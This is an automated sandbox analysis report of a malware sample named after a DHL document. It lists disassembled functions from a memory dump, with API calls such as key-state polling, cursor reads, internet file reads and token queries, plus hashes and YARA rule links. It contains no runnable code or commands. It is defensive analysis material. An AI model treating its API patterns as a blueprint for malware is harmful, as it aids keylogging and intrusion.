Opcode ID: d236bde336d61c8c334a227b673dab045b6264b6dfdaf5adf3288df920343702
Instruction ID: 623ace157d3bea4d880104249c5b191ce1a232678b5c1caea025d30bd5d9eeb2
Opcode Fuzzy Hash: d236bde336d61c8c334a227b673dab045b6264b6dfdaf5adf3288df920343702
Instruction Fuzzy Hash: 4441C475600114AFD764EF28CC94FAE7BA5EB09350F160A2AE855A73A0C375ED41CB58

Function 00422051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004220C3
_free.LIBCMT ref: 004220E3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b9ae378d6313329409288605c0d4c6f6edb9be359c2080908d4a38f9408c0551
Instruction ID: 7a157c230d35d069c80f036a311ef01fe8b9751b9955dd3cf69241c3fca3ae4f
Opcode Fuzzy Hash: b9ae378d6313329409288605c0d4c6f6edb9be359c2080908d4a38f9408c0551
Instruction Fuzzy Hash: D8410272B00210AFCB20DF79DA80A6EB3E1EF88314F55416AE605EB391DB75AD01CB84

Function 0040912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00409141
ScreenToClient.USER32(00000000,?), ref: 0040915E
GetAsyncKeyState.USER32(00000001), ref: 00409183
GetAsyncKeyState.USER32(00000002), ref: 0040919D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9270e697019cca6681cef703a51e15bafb833c33720490776bddafa69a132760
Instruction ID: 12fdee1f1a38f8f84594a7dc0630a2f7cd4e6833b4cae735b61a70959561f857
Opcode Fuzzy Hash: 9270e697019cca6681cef703a51e15bafb833c33720490776bddafa69a132760
Instruction Fuzzy Hash: 21417E71A0861AFBEF059F64C844BEEB774FF05324F20822AE425A63D1C7786D51CB99

Function 00463874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004638CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00463922
TranslateMessage.USER32(?), ref: 0046394B
DispatchMessageW.USER32(?), ref: 00463955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00463966

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 4b8c11409db7c3290a3e43b1e8c0ea10d70eb96e8f9b577abb962b85bf3d2771
Instruction ID: bb1ff0287ce62bead86746fbf48ef47533d84099492166c5736764d55e5b6b23
Opcode Fuzzy Hash: 4b8c11409db7c3290a3e43b1e8c0ea10d70eb96e8f9b577abb962b85bf3d2771
Instruction Fuzzy Hash: DB3166F05042C29AEB25DF359848FB737A4EB06305F14056FD452822A1F7B89A49CF2B

Function 0046CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0046C21E,00000000), ref: 0046CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0046CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0046C21E,00000000), ref: 0046CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0046C21E,00000000), ref: 0046CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0046C21E,00000000), ref: 0046CFF2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 3d91118fd5baa36ea252252deebe6ec6e3d7c494def75bf52c8d3f6dda4f83cd
Instruction ID: 9c3ddc967c751a7ade6131948b5875b9eb418af922d9731fab98147ca578dd46
Opcode Fuzzy Hash: 3d91118fd5baa36ea252252deebe6ec6e3d7c494def75bf52c8d3f6dda4f83cd
Instruction Fuzzy Hash: 5D315C71A00205EFDB24DFA5C8C49BBBBFAEB14314B10443FF556D2280E738AD419BA9

Function 00451901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00451915
PostMessageW.USER32(00000001,00000201,00000001), ref: 004519C1
Sleep.KERNEL32(00000000,?,?,?), ref: 004519C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 004519DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 004519E2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 683055d965d5d0f73c51b6f6fd133979469e80bfe5981f1650b09e97bf5d5d84
Instruction ID: cf04c11d3479dd832bb7c9fdfa244a2dc0576a669271394121f6e7d81948690d
Opcode Fuzzy Hash: 683055d965d5d0f73c51b6f6fd133979469e80bfe5981f1650b09e97bf5d5d84
Instruction Fuzzy Hash: 7831C2B1900219EFCB00CFA8CD99BDE7BB5EB44315F10462AFD21A72E2C7749958CB95

Function 00485706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00485745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0048579D
_wcslen.LIBCMT ref: 004857AF
_wcslen.LIBCMT ref: 004857BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00485816

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 72966cf34525744898a78ee17a24685e042b14eae7dd5649e8d215c81a639326
Instruction ID: 0d47ab0328f5a9c208649f48ef07d21c5610cdd67dc58b692b1031197a26bcd4
Opcode Fuzzy Hash: 72966cf34525744898a78ee17a24685e042b14eae7dd5649e8d215c81a639326
Instruction Fuzzy Hash: 0D21A7759046189ADB21EF60CC84AEEB778FF04724F108527E919EA290D7788985CF58

Function 00470930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00470951
GetForegroundWindow.USER32 ref: 00470968
GetDC.USER32(00000000), ref: 004709A4
GetPixel.GDI32(00000000,?,00000003), ref: 004709B0
ReleaseDC.USER32(00000000,00000003), ref: 004709E8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: b759e1380aa9fb0443a342eaf71adcf890c0eb93bcb835d5617ca5a005acfb41
Instruction ID: 4c1a644bd39ab56d325f435d2930e39008f364ea49e56b9ee79d5bf206111a51
Opcode Fuzzy Hash: b759e1380aa9fb0443a342eaf71adcf890c0eb93bcb835d5617ca5a005acfb41
Instruction Fuzzy Hash: 6D218175600204EFD704EF69D984AAEBBE5EF45704F04847DE94AA7362DB34AC04CBA4

Function 0042CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0042CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042CDE9

Part of subcall function 00423820: RtlAllocateHeap.NTDLL(00000000,?,004C1444,?,0040FDF5,?,?,003FA976,00000010,004C1440,003F13FC,?,003F13C6,?,003F1129), ref: 00423852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0042CE0F
_free.LIBCMT ref: 0042CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE31

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 4d6b05fa62f437465cb8563c70870579fbf9c1cc48e8a53afa23ddc98cf11c36
Instruction ID: ab4ed7389d663d788e30138c24c69d3cb8b70599e5139791fe481282a1b180fb
Opcode Fuzzy Hash: 4d6b05fa62f437465cb8563c70870579fbf9c1cc48e8a53afa23ddc98cf11c36
Instruction Fuzzy Hash: 180171727016257F23211AB67CCCD7F696DDEC6BA1356022EFD05C7201EE698D0282B9

Function 00409639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00409693
SelectObject.GDI32(?,00000000), ref: 004096A2
BeginPath.GDI32(?), ref: 004096B9
SelectObject.GDI32(?,00000000), ref: 004096E2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 526dfb5cbb1455cd06a52f5f5a82e9d3b92a70ef3f0ef95632353e41a43033a1
Instruction ID: 2a881fd673e7b3cbc4d62aaec86b14e62f606b0f94515031a8b1652ee97cccf8
Opcode Fuzzy Hash: 526dfb5cbb1455cd06a52f5f5a82e9d3b92a70ef3f0ef95632353e41a43033a1
Instruction Fuzzy Hash: 9A2160B0802205EBDB519F64EC48BAE3BA4BB52755F10063AF810A71F2D3799C51CF9C

Function 00455711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00455726
_memcmp.LIBVCRUNTIME ref: 00455744
_memcmp.LIBVCRUNTIME ref: 00455757
_memcmp.LIBVCRUNTIME ref: 0045576F
_memcmp.LIBVCRUNTIME ref: 00455787

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 7425f36336aa67442cc9338bcc0d1a3785359cb47cedcc5c7eeea41754ae10e5
Instruction ID: 86b9a5f6793469b74cfd8333fb500d9ef4fa62afca46ad5172b5eb541b639a0b
Opcode Fuzzy Hash: 7425f36336aa67442cc9338bcc0d1a3785359cb47cedcc5c7eeea41754ae10e5
Instruction Fuzzy Hash: 1201F97124160DBBE20866129D52FFF735C9B24399F200037FE049A642F72CEE5983AD

Function 00422DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0041F2DE,00423863,004C1444,?,0040FDF5,?,?,003FA976,00000010,004C1440,003F13FC,?,003F13C6), ref: 00422DFD
_free.LIBCMT ref: 00422E32
_free.LIBCMT ref: 00422E59
SetLastError.KERNEL32(00000000,003F1129), ref: 00422E66
SetLastError.KERNEL32(00000000,003F1129), ref: 00422E6F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 7c1006676edab45d8dc8d4cb77b2bf3a6f1949eaab4604221b88ec36b6634287
Instruction ID: 2db0e56773ff726ca93f7f38992ab5d06686d5ce61b175164cda994466f7cd4a
Opcode Fuzzy Hash: 7c1006676edab45d8dc8d4cb77b2bf3a6f1949eaab4604221b88ec36b6634287
Instruction Fuzzy Hash: 6801D672345620778612273A7E86D2F166DABD53697E2053FF815A2292EBFC8C02613C

Function 0045000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?,?,?,0045035E), ref: 0045002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?,?), ref: 00450046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?,?), ref: 00450054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?), ref: 00450064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0044FF41,80070057,?,?), ref: 00450070

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: b75d027f48b5e825f79303bb7c96ad05e951ca0622817d7c2c7dec60e943b104
Instruction ID: fc89c02eb80fed6cdd141bffd8de87b6559dfa88b645db80e913d4ba3ac1a0b9
Opcode Fuzzy Hash: b75d027f48b5e825f79303bb7c96ad05e951ca0622817d7c2c7dec60e943b104
Instruction Fuzzy Hash: 8901FD7A600204BFDB105F68EC84BAE7AEDEF44B93F144429FC01E2251E778DD048BA4

Function 0045E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0045E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0045E9A5
Sleep.KERNEL32(00000000), ref: 0045E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0045E9B7
Sleep.KERNEL32 ref: 0045E9F3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: a50324662d0e1218a8f906d5f687127e41ca479a453d0824f51454bae5559095
Instruction ID: 4137c17ad77bb62216778add15f27ee6110b0852c3f8c11cc8e355379e2a0a52
Opcode Fuzzy Hash: a50324662d0e1218a8f906d5f687127e41ca479a453d0824f51454bae5559095
Instruction Fuzzy Hash: 4F016171C01529DBCF049FE6DD896DDBB78FF09301F00095AD911B2251DB349659CB69

Function 004510F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00451114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 00451120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 0045112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 00451136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045114D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 54acf899d3f826e15941afc8124a1ce44435828d79866adfd4a533c73fb8452f
Instruction ID: d6a950919ce7e060bbcd3bb3dad89b07e16068d242b1c11f48d1781e22f832b3
Opcode Fuzzy Hash: 54acf899d3f826e15941afc8124a1ce44435828d79866adfd4a533c73fb8452f
Instruction Fuzzy Hash: 06014675200605AFDB115BA4EC89A6B3B6EEF893A1B210869FA41C2360DB31DC008F74

Function 00450FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00450FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00450FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00450FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00450FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00451002

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f4fdfc6e0cabfd99bfa9bc54e1668afa6d2fe72fb22b90dca39f707b7007cc22
Instruction ID: ce851017a9f58ef336ed916b4544e7cf8b38b34f99dcbe3cc2704e8e171c0e87
Opcode Fuzzy Hash: f4fdfc6e0cabfd99bfa9bc54e1668afa6d2fe72fb22b90dca39f707b7007cc22
Instruction Fuzzy Hash: 34F04F35141311ABD7214FA4AC8DF5B3BADEF8AB62F504829FD45D62A1CB74DC408B74

Function 00451014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0045102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00451036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00451045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0045104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00451062

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: cb21f6d07ac06f4d43d6caf5f994881beaafa7d8420d551a81cc04dd43097b56
Instruction ID: 164a38c24bf4a6539ec3f7a2a760c9aff5126220a3ef2c4113a7a064d732aa83
Opcode Fuzzy Hash: cb21f6d07ac06f4d43d6caf5f994881beaafa7d8420d551a81cc04dd43097b56
Instruction Fuzzy Hash: 9AF04F35140311ABD7215FA4EC89F5B3B6DEF8AB61F100829FD45D62A1CB74D840CB74

Function 0046030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0046017D,?,004632FC,?,00000001,00432592,?), ref: 00460324
CloseHandle.KERNEL32(?,?,?,?,0046017D,?,004632FC,?,00000001,00432592,?), ref: 00460331
CloseHandle.KERNEL32(?,?,?,?,0046017D,?,004632FC,?,00000001,00432592,?), ref: 0046033E
CloseHandle.KERNEL32(?,?,?,?,0046017D,?,004632FC,?,00000001,00432592,?), ref: 0046034B
CloseHandle.KERNEL32(?,?,?,?,0046017D,?,004632FC,?,00000001,00432592,?), ref: 00460358
CloseHandle.KERNEL32(?,?,?,?,0046017D,?,004632FC,?,00000001,00432592,?), ref: 00460365

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
